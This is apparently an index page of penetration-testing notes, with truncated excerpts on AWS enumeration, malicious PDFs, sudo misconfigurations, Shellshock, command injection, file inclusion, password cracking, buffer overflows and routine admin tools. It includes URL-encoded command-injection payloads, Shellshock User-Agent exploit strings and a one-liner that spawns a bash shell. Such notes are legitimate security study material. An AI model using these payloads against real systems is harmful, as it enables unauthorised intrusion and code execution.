-
Use profiles: See https://github.com/eon01/AWS-CheatSheet for many commands or https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-access-token/ General Get Infos of the current used profile aws [--profile $profile] sts get-caller-identity Another possibility to gain an ARN (with account id) is to call a non-existing function and to extract data from the error message. EC2 List all EC2 images = AMI’s: aws [--profile $profile] ec2…
-
This is how a PDF document looks — with a JavaScript execution. Note that with OpenAction 6 (object block 6) this block is executed when the document is opened. Other way to create a malicious PDF: Analyse a PDF file If a PDF file is compressed, decompress it first. pdftk input.pdf output output.pdf uncompress Get details with Pdfinfo…
-
Configuration options env_reset: Resets the environment to default configured in /etc/environment. env_keep: Adds environment variables which are additionally allowed. If LD_PRELOAD is in there, see below. mail_badpass: Sends an email to the admin if a user failed to provide a sudo password. secure_path: Sets the PATH environment variable to the given paths. Configurations Something like the following…
-
This post contains a collection of variable substitution commands. Bash $(echo id) Ruby #{} PHP {}
-
See also the encoding post for encoding methods. Tips Bypassing filters Linux / PHP All URL encoded values starting with a space character. | id %20%7c%20%69%64 || id %20%7c%7c%20%69%64 & id %20%26%20%69%64 && id %20%26%26%20%69%64 <?php print "1"" ?> %20%3c%3f%70%68%70%20%70%72%69%6e%74%20%22%31%22%22%20%3f%3e ;id %20%3b%69%64 Sources
-
Older bash versions may execute code after function definitions. Via command line Source with explanation export newfunction='() { echo 'shellshockdemo';}; echo vulnerable' Via a web server / CGI script Caution: Try the reverse shell example in Burp also if the curl command fails! curl http://$target/cgi-bin/admin.cgi -s > before curl -H "User-Agent: () { :; }; /bin/bash…
-
Shellshock A function in a environment variable is executed in a child process of the bash. When exporting a new function like this export func=’() { echo mist; }; echo aha;’ and starting a new bash session, “aha” is executed.
-
Local file inclusion and Wrappers General: If you try to read PHP and nothing returns — use a base64 return! Remote file inclusion PHP deserialization If a program accepts a serialized object which uses a magic method, then… TODO, see here
-
Check also IDEs like IntelliJ, Visual Studio, Eclipse, …
-
See https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 as a base64 cheat sheet. The classic (base64 combines the bytes of the text and separates 6 bit (2^6 = 64) and maps each 6 bit to a character. “=” means “two byte missing”. For example, if the combined strings have 2 bit “left” (41.…), then (A==) echo Hi | base64 -d Convert hex…
-
From SANS660: “Fuzzing is not an attack; it is a fault-testing technique.” Types are: Instrumented Fuzzing: “Monitoring” a system to learn how normal inputs look like. No pre-knowledge of the system needed. Intelligent utation: A protocol grammar which defines paths through all the code. Inputs are mutated according to the grammar. Tools https://tools.kali.org/vulnerability-analysis/sfuzz See https://en.kali.tools/all/?category=fuzzer Sulley…
-
Enumeration Multiple
-
GZ If the file cannot be extracted gzip: log.gz: unexpected end of file use zcat index.gz
-
Show tables .tables Show columns / schema from a table PRAGMA table_info(users)
-
General commands Show available Docker images docker images Show running Docker instances docker ps Run an instance in foreground (debug logs are visible) docker run -p 8080:80/tcp --name bolt11 aerth/boltcms:latest Run an instance in the background docker run -p 8000 --name <name> -d -t <imagename> Open shell into an instance docker exec -it <container_name> /bin/bash…
-
Fingerprintjs2 collects a vast amount of browser configurations. Victims could be brought to visit a site which contains this JS which sends the information back to the attacker. See OSCP 414ff
-
The Windows registry is a central data storage for the operation system as well as for applications. It’s a key-value storage in a tree structure. A hive is a set of keys and their values. The root hives are: Short Long Content Source file HKCR HKEY_CLASSES_ROOT Information about file types and properties HKCC HKEY_CURRRENT_CONFIG Information about…
-
Checklist A domain of a DC consists out of the following elements: An object in AD may have a set of ACE Access Control Entries which is called ACL Access Control List. An object’s ACE can be retrieved in PS with Get-ObjectAcl [-Identity| $object. The SCM Service Control Manager contains a database of installed services…
-
ext3/ext4 Design principles: Information about the file system General information fsstat /dev/sda1 Information of an inode (2 = root directory): istat /dev/sda1 2 Get the partitions of an image mmls server.img mmls shows the start offset of each partition. Show details of the partition which starts at 4096: fsstat -o 4096 server.img Show all files of a…
-
Powershell Cmdlets consist out of Verb-Method. To search for a method, type Get-Command New-U* To see all attributes for a Cmdlet, type Get-LocalUser | Get-Member To see specific or non-default attributes, type Get-LocalUser | Select-Object -Property Name,PasswordRequired Examples Directories and files Get all files in the current directory. Get-ChildItem Get all files in the current directory and below.…
-
Convert a Python2 script into a Python3 script: 2to3 -w example.py Fix tab/space/identation problems: autopep8 -i linuxprivchecker.py If a library is installed, but cannot found from smb.SMBConnection import SMBConnection then try to search the file locally and include the path manually: import syssys.path.append("path/to/your/file") Oneliner for executing bash in a file: echo 'import os;os.system("/bin/bash")' > /tmp/e.py Execute something:…
-
Auf dem Client: root@raspberrypi:/etc/apt# cat apt.conf Acquire::http::Proxy "http://10.10.14.38:3128"; Auf dem Proxy:
-
Cross-compiling for 32/64 bit systems sudo apt-get install gcc-multlib gcc ‑m32 datei.c Tipp: Add ‑static for a static binary. Note that you need to install packets for the target platform, e.g. apt install gcc-i686-linux-gnu. Cross-compiling for Windows Install the packages like apt install gcc-mingw-w64. Then use x86_64-w64-mingw32-gcc execute.c -o execute.exe. Disable security features You can…
-
List with a ton of one-liner web servers in various languages HTTP python -m SimpleHTTPServer 8000 python3 -m http.server 8000 HTTPS ruby -r webrick/https -e ' WEBrick::HTTPServer.new( Port: 8000, DocumentRoot: ".", SSLEnable: true, SSLCertName: [%w[CN localhost]]).start'
-
(!) See also Password spraying to check a obtained password against usernames. Note: Use http://rumkin.com/tools/cipher/ if you have to encode/decrypt/decipher something on the fly. Wordlist optimization If there is a password policy known: Check password policy In Windows, type net accounts to get informations about account locking, lockout threasholds etc. Cloud-based performance cracking See NPK Default passwords Hashcat Am…
-
Use the bof1_web.py or bof1_socket.py to start. Use bof1_socket_10.py to determine the position of the EIP. Use bof2_socket_20.py with the found EIP offset to verify that the EIP was overwritten with B’s. Use bof3_socket_10.py with the found EIP and find all bad chars. Find with Mona a JMP address. Create payload, add it and €profit. 0. Confirm vulnerability Download…
-
Note that iptables and ip6tables should be used always together! Tables Iptables manages a set of tables which act as ACL Access Control Lists. Actions Actions are defined via the -j option. Examples Show all rules iptables -Lip6tables -L Ignore all packets from a network: iptables -A INPUT -s 192.168.5.1/32 -j DROPip6tables -A INPUT -s fd75:943b:5f2e:0:a4:45a1:b753:4152 -j…
-
Screen-Sitzung mit Namen starten screen -S name Screen-Sitzungen auflisten screen -ls Screen-Sitzung fortsetzen screen -xS name